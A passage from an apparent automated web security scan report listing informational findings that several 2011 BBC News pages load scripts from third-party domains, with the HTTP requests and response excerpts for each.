<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.56. http://www.bbc.co.uk/news/world-us-canada-12436383

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12436383 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=741
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.57. http://www.bbc.co.uk/news/world-us-canada-12437116

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12437116 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 68875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.58. http://www.bbc.co.uk/news/world-us-canada-12437121

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12437121 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.c